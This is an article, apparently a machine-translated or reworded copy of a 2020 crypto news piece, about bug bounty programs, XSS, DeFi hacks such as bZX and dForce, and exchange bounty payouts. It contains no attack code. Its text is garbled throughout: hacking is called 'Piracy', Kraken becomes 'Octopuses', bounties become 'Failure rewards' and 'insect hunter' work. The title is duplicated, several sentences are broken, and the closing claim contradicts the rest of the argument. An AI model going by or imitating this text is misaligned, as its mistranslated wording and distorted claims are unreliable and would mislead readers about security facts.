Skip to content

Testing an army of hackers can help improve cryptocurrency security, but isn’t that enough?

June 12, 2020

In the last decade, Piracy has gradually become a respectable and potentially rewarding career thanks to the introduction of bug rewards.

While some Organizations like Mozilla released bug rewards in 2004. The biggest boost for the industry came when Google and Facebook launched similar programs in 2010 and 2011. respectively. Soon after, in 2011 and 2012, platforms like Bugcrowd and HackerOne marketed the error rewards to make configuration easier for other companies.

Failure rewards are paid by independent investigators who Find and report vulnerabilities This could affect the security of the system or its users. One of the most common security gaps is the so-called attack Cross-Site Scripting (XSS), This will insert malicious JavaScript into a user’s browser.

Testing an army of hackers can help improve cryptocurrency security, but isn’t that enough?Testing an army of hackers can help improve cryptocurrency security, but isn’t that enough?

Because of the way JavaScript penetrates the web today, this attack can essentially be used to hijack a victim’s account. And Google pays up to $ 7,500 for this category of errors.

Why are bug rewards useful?

Security checks and code checks are limited both in time and in terms of the number of checking eyes. While are useful for detecting “every last rotten fruit” before the software is released to the publicSome of the most serious mistakes could be Result of the composition of many subtle design flaws.

As a current example of this, an independent researcher found a serious error in the algorithm ProgPoW despite multiple previous audits.

Recent hacks in decentralized finance or DeFi, show the complexity of these systems. In the first bZX hack The core of the vulnerability was a subtle mistake check the right collateral for bZX smart contracts, but flash loans and other platforms provided the necessary tools Extract money through this mistake.

The Google rewards program shows this in a simple way It is almost impossible to unlock secure code from scratch. Your bug bounty program has been logged an unprecedented record $ 6 million in payments in 2019, nine years after the start. During this timeThe company had all the tools to perfect its internal security practices. but the complexity of their systems seems to have made it almost impossible.

Crypto bug rewards

Many crypto companies and projects orThey will give generous rewards for critical mistakes. The projects of DeFi Maker, Compound and Aave have maximum rewards of $ 100,000, 150,000 and $ 250,000 respectively.

The main exchanges like Kraken, Coinbase and Binance also offer bug bounty programs. Octopuses do not have an explicit maximum Coinbase and Binance exceed $ 50,000 and $ 10,000 respectively. respectively. Not all major exchanges have started such programs, especially Huobi and Bitstamp.

It is worth noting that the maximum payment is announced doesn’t necessarily make the show more attractive, since the amounts paid are almost always at the company’s discretion.

Of the 458 reports submitted to Coinbase, the maximum payment was only $ 20,000. while the average is only $ 200. This is probably due to the low severity of the errors. However, these statistics are important signals for researchers who need to decide which platform to focus on. Some of the highest average payouts in Hacker One can be obtained from Monolith, Tron (TRX) and Matic, although the latter has just started its bug bounty program.

Can error rewards save projects?

The cryptocurrency infrastructure makes it the ideal target for hackers due to its cash-like properties. because it’s much more difficult to steal digital money from a bank.

Successful attacks such as Coincheck, in which the perpetrators of the $ 500 million hack were not caught after more than two years, They attract malicious hackers more than other industries.

According to a security ranking published by Hacken in 2019 82% of all exchanges do not have a bug bounty program. Of those who do and who are high on your list, Only Binance suffered a major attack in 2019.

Strangely enough Both bZX and dForce had set up bug bounty programs before their incidents. but they had remarkable warnings.

The program from bZX only had a maximum payment of $ 5,000 and that was crucial The investigators provide proof of identity before collecting the reward. It also seems that it was only published in a medium post. After the incident The project has resolved all of the above problems.

The program from DForce also required submission of documents, and while the maximum payout was $ 50,000, I just covered the stablecoin system USDx, not the Lendf.me platform that was hacked.

While Companies are required to withhold payments from researchers living in sanctioned regions. Very few successful programs require full identity control to receive money. From an insect hunter’s perspective, sending IDs can be a double-edged sword Due to frequent legal retaliation against completely legitimate hackers what keeps them from applying.

With all of this in mind, there appears to be a significant correlation between the presence of a Fair bug rewards and catastrophic attacks.

In conversation with Cointelegraph Egor Homakov, a respected security researcher, warned those who wanted to benefit from the rewards:

“The rewards shouldn’t be forced on any project, and the interest should come from within. Every project already includes a standard reward program, only the rewards are the same [a] $ 0. I don’t think people should pressure programs for larger amounts. This market is completely self-regulating and does not require any further research requirements. “

Measured against the reactions of some hacked companies to incidents, better error rewards may be on the way.